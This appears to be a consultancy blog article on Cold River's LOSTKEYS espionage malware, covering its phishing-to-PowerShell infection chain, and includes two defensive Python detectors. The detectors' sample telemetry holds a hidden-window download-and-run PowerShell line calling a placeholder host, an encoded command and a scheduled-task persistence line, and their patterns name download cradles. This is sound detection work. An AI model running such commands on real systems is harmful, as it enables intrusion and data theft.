On the complex chessboard of modern geopolitics, war is no longer fought solely on the battlefield. Conflicts in the 21st century have spread into cyberspace, where networks, servers, and email accounts have ceased to be mere communication tools and have become the new front lines of combat.
Cyberwarfare, a new dimension of international conflicts, is increasingly present on the agendas of governments and global security institutions. A clear example of this evolution is the recent revelation made by Google’s security team, which uncovered a sophisticated cyber espionage campaign carried out by the Russian group Cold River.
The campaign used a newly developed malware named LOSTKEYS, which represents not only a technical threat in terms of cybersecurity but also a warning about how cyber operations can influence global politics, public opinion, and international security. Below, ITD Consulting explains the details about the LOSTKEYS malware.
Who is Cold River?
Cold River, also known by other aliases such as Star Blizzard, UNC4057, or Callisto Group, is a cyber-espionage group with strong ties to the Russian government, particularly to the Federal Security Service (FSB), Russia’s main intelligence and security agency. This group has been actively operating since at least 2016, and its activities have mainly targeted high-value espionage targets in the West, including governments, intelligence agencies, military institutions, universities, NGOs, journalists, and more recently, organizations related to Ukraine.

What distinguishes Cold River from other cybercriminal groups is its strategic approach. Unlike actors seeking immediate financial gain by stealing personal or financial data, Cold River’s primary goal is to obtain sensitive and strategic information that can be used to support the interests of the Kremlin. Cold River’s activity has primarily focused on gathering political, economic, and military intelligence, with particular emphasis on geopolitical conflicts involving Russia, especially its conflict with Ukraine and its tense relations with Western nations.
Over the years, Cold River has used a wide variety of cyber espionage tools, but the emergence of the LOSTKEYS malware has further elevated its profile. LOSTKEYS is a testament to the level of sophistication and customization that Cold River has achieved in its operations, raising global concerns about the implications of cyberwarfare on international security and stability.
LOSTKEYS: A Malware Designed for Surgical Espionage
The LOSTKEYS malware, discovered by Google between January and April 2025, is an outstanding example of how state actors can use cyber tools in a targeted and surgical manner to gain access to highly sensitive information. Unlike other forms of malware, such as ransomware or banking trojans, which are designed to affect a large number of users en masse, LOSTKEYS is used selectively, with the aim of compromising specific individuals or entities.
Cold River has designed this malware with a precise focus, targeting key individuals in governments, armed forces, intelligence sectors, media outlets, and NGOs involved in highly geopolitically sensitive matters. One of the most interesting aspects of LOSTKEYS is its customization capability.
Each attack using LOSTKEYS appears to be specifically tailored to the selected victim, making it much harder to detect and mitigate its effects. Moreover, LOSTKEYS employs a series of advanced evasion and obfuscation techniques to avoid detection by traditional security systems, making it an extremely dangerous tool.
Stages of the LOSTKEYS Attack
The attack carried out using the LOSTKEYS malware follows a series of carefully orchestrated steps that combine social engineering, advanced evasion techniques, and exploitation of vulnerabilities in computer systems. These are the main phases of a LOSTKEYS attack:
1. Highly Targeted Phishing
Cold River uses a highly sophisticated phishing technique to deceive its victims. The phishing emails are designed to look legitimate, using real and detailed context, such as recent conferences or specific professional links. These emails include links to spoofed websites that accurately mimic genuine government or academic pages. The trust generated by these emails increases the success of the LOSTKEYS attack.
2. CAPTCHA Simulation and Hidden Activation
When the user clicks on the link in the email, they are redirected to a fake site that presents an apparently harmless CAPTCHA form. This form aims to trick the user into completing it, which activates a hidden script that copies malicious code to the user’s clipboard. By performing this step, the LOSTKEYS malware is triggered without the victim noticing.
3. Execution via PowerShell
In this step, the user, believing they are completing a legitimate verification process, pastes and runs the copied command in PowerShell, a Windows system administration shell. This command downloads and installs the LOSTKEYS malware onto the victim’s system, leaving no visible traces or notifications.
4. Persistence and Concealment
Once installed, the LOSTKEYS malware hides within legitimate system processes, such as svchost.exe, and sets up scheduled tasks to ensure its persistence. LOSTKEYS also employs advanced obfuscation techniques to make detection by traditional antivirus tools more difficult.
5. Information Theft and Exfiltration
Once activated, LOSTKEYS begins scanning the system for sensitive information such as confidential documents, access credentials, browsing histories, and other strategically valuable data. This information, extracted by LOSTKEYS, is then sent to remote servers controlled by Cold River, which are constantly rotated to avoid tracking.
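The five stages above describe a behaviour chain that endpoint telemetry can catch even when the payload itself is customised per victim. The following detector is an added example written for this article, not code from the original page or from Google’s report. It walks Windows process-creation events (field names follow Sysmon Event ID 1: ParentImage, Image, CommandLine) and flags two traits of stages 3 and 4: a PowerShell spawned from explorer.exe (the parent of a command pasted into the Run dialog) with a hidden window, an encoded command or a download cradle, and a scheduled task whose action points at a user-writable path. Every sample event, hostname, path and URL below is constructed for illustration and is not a LOSTKEYS indicator.

```python
"""Detector for the ClickFix-style PowerShell and scheduled-task chain (stages 3 and 4).

Added example, not code from the original article or from Google's report.
Event fields follow Sysmon Event ID 1 naming; the sample events are constructed
for illustration and are not real LOSTKEYS indicators of compromise.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    record_id: int
    parent_image: str   # Sysmon ParentImage
    image: str          # Sysmon Image
    command_line: str   # Sysmon CommandLine


# powershell.exe accepts any unambiguous prefix of -WindowStyle Hidden (-w h, -win hidden, ...).
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (does not match -ExecutionPolicy).
ENCODED_CMD = re.compile(r"-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}", re.I)
# Download-and-run primitives typically chained in a pasted one-liner.
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|"
    r"downloadfile|iex|invoke-expression|frombase64string)\b", re.I)
# Scheduled-task action living in a location a standard user can write to.
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|public|programdata)\\", re.I)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyse(ev: ProcEvent) -> list[str]:
    """Return the suspicious traits found in one event (empty list if clean)."""
    reasons: list[str] = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if image in {"powershell.exe", "pwsh.exe"}:
        traits = []
        if HIDDEN_WINDOW.search(ev.command_line):
            traits.append("hidden window")
        if ENCODED_CMD.search(ev.command_line):
            traits.append("encoded command")
        if DOWNLOAD_CRADLE.search(ev.command_line):
            traits.append("download cradle")
        # A shell opened from the Start menu also has explorer.exe as its parent,
        # so the parent alone is not enough: require at least one evasive trait.
        if parent == "explorer.exe" and traits:
            reasons.append("powershell spawned by explorer.exe (Run dialog / pasted command)")
            reasons.extend(traits)
        elif len(traits) >= 2:
            reasons.extend(traits)
    elif image == "schtasks.exe" and re.search(r"/create\b", ev.command_line, re.I):
        if USER_WRITABLE.search(ev.command_line):
            reasons.append("scheduled task created with action in a user-writable path")
    return reasons


def detect(events) -> list[dict]:
    """Run analyse() over a stream of events and keep only those with findings."""
    return [{"record_id": ev.record_id, "image": ev.image, "reasons": r}
            for ev in events if (r := analyse(ev))]


# Constructed sample telemetry: paths, task name and URL are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -c "iwr http://lure.invalid/verify | iex"'),
    ProcEvent(2, r"C:\Windows\explorer.exe", PS, "powershell"),
    ProcEvent(3, r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs -p"),
    ProcEvent(4, PS, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc minute /mo 15 /tn "Updater" /tr C:\Users\alice\AppData\Roaming\upd.exe'),
    ProcEvent(5, r"C:\Windows\System32\cmd.exe", PS,
              r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent(6, r"C:\Windows\explorer.exe", PS,
              "powershell -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAApAA=="),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"record {hit['record_id']}: {hit['image']} -> {', '.join(hit['reasons'])}")
```

Events 2 and 5 are deliberately benign lookalikes (an interactive shell opened from the Start menu, and an administrator running a script from cmd.exe with -ExecutionPolicy Bypass); the rules ignore them, which keeps the detector usable on a real estate where PowerShell is part of daily administration.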
What Sets LOSTKEYS Apart from Other Threats
While there are thousands of malicious programs in circulation, LOSTKEYS stands out from many others due to several key factors that make it a high-level strategic threat:
- Extreme Customization: Unlike many malicious programs, LOSTKEYS is not generic malware. Each instance of LOSTKEYS appears to be specifically designed for the chosen target, meaning Cold River has invested significant resources to tailor the attack to each victim’s unique characteristics.
- Use of Legitimate Infrastructure: To avoid detection, Cold River uses legitimate cloud services such as Dropbox, Google Drive, or Amazon S3 to host and distribute the LOSTKEYS malware. This use of legitimate infrastructure greatly complicates the task of defenders, as conventional security filters often struggle to identify these threats.
- Advanced Evasion Tactics: LOSTKEYS is capable of detecting if it is being executed in an analysis environment, such as a sandbox, and can deactivate itself to avoid detection. This advanced evasion tactic makes malware detection and mitigation much more difficult.
- Long-Term Campaign: Unlike many cyberattacks that seek immediate results, Cold River’s goal with LOSTKEYS is to establish a persistent presence on victims’ systems, allowing for continuous data theft over weeks or even months.

Geopolitical Objectives Behind the Attack
The use of the LOSTKEYS malware cannot be understood without considering the political context in which it takes place. Since Russia’s invasion of Ukraine in 2022, cyberattacks have played a fundamental role in the Russian strategy to weaken Ukrainian infrastructure and undermine Western support for Ukraine.
In this context, cyber espionage has become a key tool for obtaining sensitive information about the plans of Western governments and international policies. The targets selected by Cold River in the LOSTKEYS campaign have often been key figures capable of influencing global politics, such as diplomats critical of the Kremlin, academics influential in matters of economic sanctions, energy security experts, and internationally visible journalists.
By gaining access to the personal and professional information of these individuals through the use of LOSTKEYS, Russia can anticipate political decisions, manipulate public opinion, or design more effective disinformation campaigns.
Impact of LOSTKEYS on International Cybersecurity
The discovery of LOSTKEYS has triggered a strong reaction among major cybersecurity agencies worldwide, which have issued alerts and reinforced their defenses against potential attacks of this type. Among the main responses are:
- Google: Has blocked more than 100 domains related to Cold River and implemented security alerts for potential victims.
- Microsoft: Has strengthened its early warning systems to detect unusual access to institutional accounts.
- NCSC (UK) and CISA (USA): These agencies have issued recommendations to governments and private organizations to reinforce their defense systems against cyber threats.
- NATO: Has intensified its efforts in shared cyber intelligence, as several of its officials were targeted in these attacks.
What Risks Does It Pose to the Average User?
Although LOSTKEYS has primarily been used against high-value targets, its methods could be adopted by other actors, posing significant risks to ordinary users and organizations around the world. The risks of LOSTKEYS include:
- Identity Theft: Data stolen by LOSTKEYS could be used to create fake identities or manipulate the personal information of public figures.
- Leak of Confidential Information: Sensitive information obtained by LOSTKEYS could be used for political or economic manipulation.
- Malware Reuse: Other malicious actors could adapt LOSTKEYS for their own purposes, creating broader variants affecting a larger number of users.
- Chain Attacks: A system compromised by LOSTKEYS could be used as an entry point to infect other networks and institutions.
Cybersecurity Recommendations
Below are some measures that individual users, companies, and governments can adopt to reduce the risk of infections by malware such as LOSTKEYS:
For Individual Users:
- Avoid Clicking on Suspicious Links: Always verify the domain of emails requesting authentication or password changes.
- Enable Multi-Factor Authentication (MFA): This additional layer of security can block many attacks even if credentials are stolen.
- Avoid Copying and Pasting Commands into PowerShell or Terminals: This technique was key in the deployment of LOSTKEYS.
- Keep Software and Antivirus Up to Date: Keeping the operating system, browsers, and antivirus software up to date is essential for defending against cyber threats.
- Set Up Security Alerts: Many email platforms, like Gmail or Outlook, allow for configuring notifications for unusual login activity.
For Organizations:
- Implement EDR (Endpoint Detection & Response) Solutions: These tools help detect anomalous behavior on devices and networks.
- Monitor Outbound Traffic: Identifying connections to suspicious or unrecognized servers can help detect an attack in its early stages.
- Regular Staff Training: Awareness about phishing and cybersecurity is crucial for preventing attacks.
- Review Access and Privilege Policies: Apply the principle of least privilege to limit the damage in the event of a breach.
- Conduct Regular Security Audits: Preferably, these audits should be carried out by external firms to obtain an impartial evaluation of the infrastructure.
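The "monitor outbound traffic" recommendation is easier to act on with a concrete triage rule. The script below is an added example written for this article, not code from the original page or from any vendor tool. It reads proxy or firewall log lines and, for each (host, destination, process) pair, checks two properties that the article associates with LOSTKEYS exfiltration: the destination is contacted by very few hosts in the estate (legitimate cloud or corporate services are used broadly), and the connection timing is regular (polling a rotating drop point or command server tends to be metronomic). The log format, hostnames, destinations and byte counts are all constructed for illustration.

```python
"""Outbound-traffic triage over proxy/firewall logs.

Added example, not code from the original article. Flags (host, destination,
process) pairs that are both rare across the estate and regularly timed.
The log format and every value below are constructed for illustration.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

LINE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) proc=(?P<proc>\S+) dst=(?P<dst>\S+) bytes=(?P<bytes>\d+)$")


def parse(lines):
    """Parse key=value log lines; malformed lines are skipped, not fatal."""
    records = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        rec["bytes"] = int(rec["bytes"])
        records.append(rec)
    return records


def triage(records, max_hosts=1, min_hits=4, max_cv=0.2):
    """Return pairs whose destination is seen from at most max_hosts hosts,
    with at least min_hits connections and a coefficient of variation of the
    inter-connection gaps at or below max_cv (0 means perfectly periodic)."""
    hosts_per_dst = defaultdict(set)
    pairs = defaultdict(list)
    for r in records:
        hosts_per_dst[r["dst"]].add(r["host"])
        pairs[(r["host"], r["dst"], r["proc"])].append(r)

    findings = []
    for (host, dst, proc), rs in pairs.items():
        if len(hosts_per_dst[dst]) > max_hosts or len(rs) < min_hits:
            continue
        rs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rs, rs[1:])]
        mean_gap = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean_gap if mean_gap else 0.0
        if cv <= max_cv:
            findings.append({
                "host": host, "dst": dst, "proc": proc, "hits": len(rs),
                "interval_s": mean_gap, "cv": round(cv, 3),
                "bytes_out": sum(r["bytes"] for r in rs),
            })
    return sorted(findings, key=lambda f: (-f["bytes_out"], f["host"]))


# Constructed sample log: ws-17 pushes data every 10 minutes to a destination
# nobody else uses; the other traffic is ordinary mail, updates and browsing.
SAMPLE_LOG = [
    "2025-04-02T09:00:00Z host=ws-17 proc=powershell.exe dst=drop.cloud-storage.invalid bytes=51200",
    "2025-04-02T09:10:00Z host=ws-17 proc=powershell.exe dst=drop.cloud-storage.invalid bytes=48640",
    "2025-04-02T09:20:00Z host=ws-17 proc=powershell.exe dst=drop.cloud-storage.invalid bytes=52736",
    "2025-04-02T09:30:00Z host=ws-17 proc=powershell.exe dst=drop.cloud-storage.invalid bytes=50176",
    "2025-04-02T09:40:00Z host=ws-17 proc=powershell.exe dst=drop.cloud-storage.invalid bytes=49152",
    "2025-04-02T09:02:00Z host=ws-17 proc=outlook.exe dst=mail.corp.invalid bytes=4096",
    "2025-04-02T09:05:00Z host=ws-03 proc=outlook.exe dst=mail.corp.invalid bytes=3072",
    "2025-04-02T09:06:00Z host=ws-08 proc=outlook.exe dst=mail.corp.invalid bytes=2048",
    "2025-04-02T09:01:00Z host=ws-03 proc=updater.exe dst=updates.vendor.invalid bytes=1024",
    "2025-04-02T09:47:00Z host=ws-03 proc=updater.exe dst=updates.vendor.invalid bytes=1024",
    "2025-04-02T12:30:00Z host=ws-03 proc=updater.exe dst=updates.vendor.invalid bytes=1024",
    "2025-04-02T15:02:00Z host=ws-03 proc=updater.exe dst=updates.vendor.invalid bytes=1024",
    "2025-04-02T10:15:00Z host=ws-08 proc=chrome.exe dst=news.site.invalid bytes=12288",
    "2025-04-02T11:40:00Z host=ws-08 proc=chrome.exe dst=news.site.invalid bytes=9216",
    "this line is deliberately malformed and must be skipped",
]

if __name__ == "__main__":
    for f in triage(parse(SAMPLE_LOG)):
        print(f"{f['host']} -> {f['dst']} via {f['proc']}: {f['hits']} hits, "
              f"every {f['interval_s']:.0f}s, cv={f['cv']}, {f['bytes_out']} bytes out")
```

Only the ws-17 pair survives: the mail server is shared by three hosts, the vendor update host is rare but irregular (cv well above 0.2), and the news site has too few connections to judge. The thresholds are starting points to tune against a baseline of the organisation’s own traffic; the rarity check in particular is what lets this catch abuse of legitimate cloud storage that a domain blocklist would not.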
For Governments and Public Bodies:
- Develop National Cyber Defense Infrastructure: Governments must strengthen their capacity to defend against advanced threats and support vulnerable private entities.
- Active International Collaboration: Real-time intelligence sharing is crucial to effectively detect and neutralize cyber threats.
- Clear Legislation on International Cyberattacks: Establish clear legal frameworks to define responsibilities and response mechanisms for cyberattacks.
- Cyber Crisis Simulations: Drills should involve key sectors such as energy, health, and defense to improve preparedness for large-scale attacks.

LOSTKEYS is not just sophisticated malware: it is a reflection of a profound transformation in how nation-states conduct intelligence operations and conflict. Throughout history, espionage has been a fundamental tool for understanding the intentions and capabilities of adversaries.
However, in the 21st century, this activity has found a new domain of action in cyberspace, where geographical barriers disappear and attacks can be executed remotely, stealthily, and with global impact. The existence of threats like LOSTKEYS demonstrates that governments are willing to invest in offensive cyber capabilities not only as defensive tools but also as strategic instruments to shape the international environment to their advantage.
This new dimension of conflict, based on information manipulation, unauthorized access to critical systems, and the destabilization of key actors, presents an unprecedented challenge to the international community. Unlike traditional attacks, cyberattacks are difficult to attribute with certainty, which complicates diplomatic and military responses.
Moreover, the effects of a campaign like Cold River’s are not limited to technical damage: they can influence political decisions, disrupt democratic processes, and undermine public trust in key institutions. Digital espionage, therefore, is not just a technological issue—it is a comprehensive threat that must be addressed from multiple angles: legal, diplomatic, military, and, above all, cultural.
Cold River and tools like LOSTKEYS will continue to evolve as the conflict between global powers intensifies. Public and private organizations that fail to adapt to this new reality risk becoming vulnerable to actors who not only seek to steal data but also to interfere with their strategic operations.
Cybersecurity can no longer be seen as a mere technical function delegated to an IT department; it must become a cross-cutting priority, integrated at all levels of decision-making. Only a culture of prevention, constant vigilance, and international collaboration will allow nations and their institutions to withstand the emerging threats of contemporary digital espionage.
If you want to learn more about cyber threats like LOSTKEYS and how to protect yourself, write to us at [email protected]. We have a team of experts ready to advise you and provide the best cybersecurity solutions tailored to your needs.